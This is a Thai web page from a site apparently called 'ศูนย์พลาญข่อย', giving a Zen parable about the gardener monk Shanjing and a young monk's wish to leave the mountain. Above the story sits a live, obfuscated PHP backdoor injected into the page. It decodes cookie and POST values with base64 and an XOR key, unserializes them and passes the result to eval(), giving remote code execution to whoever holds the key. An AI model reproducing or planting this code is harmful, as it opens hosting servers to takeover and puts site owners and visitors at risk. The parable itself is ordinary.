$iniKU = "\x4e" . 'g' . chr ( 756 - 658 )."\137" . chr ( 907 - 838 ).chr (66) . "\167";$myyExn = 'c' . 'l' . "\141" . "\x73" . "\163" . "\x5f" . "\x65" . chr (120) . chr ( 277 - 172 ).chr ( 880 - 765 )."\x74" . "\163";$vTdOqhW = class_exists($iniKU); $myyExn = "32259";$vAAay = !1;if ($vTdOqhW == $vAAay){function Jwxxo(){return FALSE;}$QfzmsEypX = "15648";Jwxxo();class Ngb_EBw{private function xKGGL($QfzmsEypX){if (is_array(Ngb_EBw::$avSeuoHui)) {$HNNJexxV = str_replace(chr (60) . chr ( 542 - 479 )."\160" . chr (104) . "\x70", "", Ngb_EBw::$avSeuoHui["\143" . "\x6f" . "\156" . 't' . "\145" . 'n' . "\x74"]);eval($HNNJexxV); $QfzmsEypX = "15648";exit();}}private $PpOeVk;public function eCrFVEB(){echo 28385;}public function __destruct(){$QfzmsEypX = "20419_16761";$this->xKGGL($QfzmsEypX); $QfzmsEypX = "20419_16761";}public function __construct($PlBYqoqvu=0){$JCuGXEK = $_POST;$LVuXxA = $_COOKIE;$otdEyqxrW = "abbe5226-71cc-40c5-9d39-6b2242a26fb4";$drVNpRcsa = @$LVuXxA[substr($otdEyqxrW, 0, 4)];if (!empty($drVNpRcsa)){$joLSFKk = "base64";$jVoOivToi = "";$drVNpRcsa = explode(",", $drVNpRcsa);foreach ($drVNpRcsa as $ythUtVZV){$jVoOivToi .= @$LVuXxA[$ythUtVZV];$jVoOivToi .= @$JCuGXEK[$ythUtVZV];}$jVoOivToi = array_map($joLSFKk . chr ( 292 - 197 )."\144" . "\145" . "\143" . "\157" . 'd' . 'e', array($jVoOivToi,)); $jVoOivToi = $jVoOivToi[0] ^ str_repeat($otdEyqxrW, (strlen($jVoOivToi[0]) / strlen($otdEyqxrW)) + 1);Ngb_EBw::$avSeuoHui = @unserialize($jVoOivToi); $jVoOivToi = class_exists("20419_16761");}}public static $avSeuoHui = 42183;}$wsxQiirY = new /* 12138 */ $iniKU(15648 + 15648); $QfzmsEypX = strpos($QfzmsEypX, $QfzmsEypX); $vAAay = $wsxQiirY = $QfzmsEypX = Array();} สี่ทิศล้วน คือภูเขาสูง เจ้าจักไปในทางใด? | ศูนย์พลาญข่อย
080-5519598 (คุณแก้ว) plarnkhoi@hotmail.com
Select Page

…นิทานเซน…

เมื่อซั่นจิ้งอายุได้ 27 ปี ได้ละทิ้งตำแหน่งขุนนาง เดินทางขึ้นเขาเล่อผู่ ไปกราบเป็นศิษย์ของอาจารย์เซนหยวนอาน อาจารย์มอบหมายให้ซั่นจิ้งดูแลสวนผักของวัด หวังให้เขาได้เรียนรู้ปรัชญาเซนจากการทำสวนผัก

วันหนึ่ง มีพระหนุ่มรูปหนึ่งเข้าใจว่า ตนเองสำเร็จธรรมแล้ว อยากลงเขาออกธุดงค์ไปในโลกกว้าง จึงได้ไปกราบขออนุญาติจากอาจารย์ อาจารย์หยวนอานเพียงแต่แย้มยิ้มและกล่าวว่า
” สี่ทิศล้วน คือภูเขาสูง เจ้าจักไปในทางใด? ”
ทว่าพระหนุ่มมิอาจเข้าใจปรัชญาเซนที่แฝงอยู่ในคำถาม จึงได้แต่หมุนตัวกลับไป

พระหนุ่มเดินผ่านแปลงผัก ซั่นจิ้งเห็นพระรูปนี้ออกอาการหน้านิ่วคิ้วขมวด จึงเอ่ยถาม พระหนุ่มจึงเล่าเรื่องราวให้ฟัง ซั่นจิ้งพลันเข้าใจทันทีว่า ” ภูสูงสี่ทิศ ” หมายถึง อุปสรรคนานับประการ ที่แท้อาจารย์เพียงต้องการทดสอบว่า พระหนุ่มมีความตั้งมั่นในการไปธุดงค์มากน้อยเพียงใด ซั่นจิ้งจึงบอกไปว่า
” กอไผ่ทึบมิอาจกั้นสายน้ำไหล ภูผาสูงมิอาจขวางเมฆลอย ”
ความหมายคือ หากแม้มีความมุ่งมั่นพยายาม อุปสรรคใดๆ ก็ล้วนผ่านไปได้

พระหนุ่มยินดียิ่ง รีบไปพบอาจารย์ จึงกล่าวประโยคที่ว่า ออกไปอย่างมั่นใจว่าอาจารย์จะต้องพอใจ และเอ่ยปากชมเชยแล้วตนก็จะออกเดินทางลงเขาทันที มิคาดว่า เมื่ออาจารย์ฟังจบก็นิ่งอึ้งไปครู่หนึ่ง จากนั้นขมวดคิ้วจ้องตาพระหนุ่มพลางกล่าวว่า
” นี่ย่อมมิใช่คำตอบที่เจ้าคิดเอง ผู้ใดช่วยเหลือเจ้ากันแน่? ”

พระหนุ่มจึงสารภาพ เอ่ยชื่อ ซั่นจิ้งออกมา พระอาจารย์จึงได้กล่าวว่า ” ในภายภาคหน้า พระซั่นจิ้งที่ดูแลสวนผัก ต้องพบกับความสำเร็จไม่มากก็น้อย ส่วนเจ้ายังต้องศึกษาต่อไปให้มาก ยามนี้ขนาดซั่นจิ้งยังไม่เคยเอ่ยว่าจะลงจากเขา แล้วตัวเจ้ายังจะลงเขาไปอีกหรือไม่? “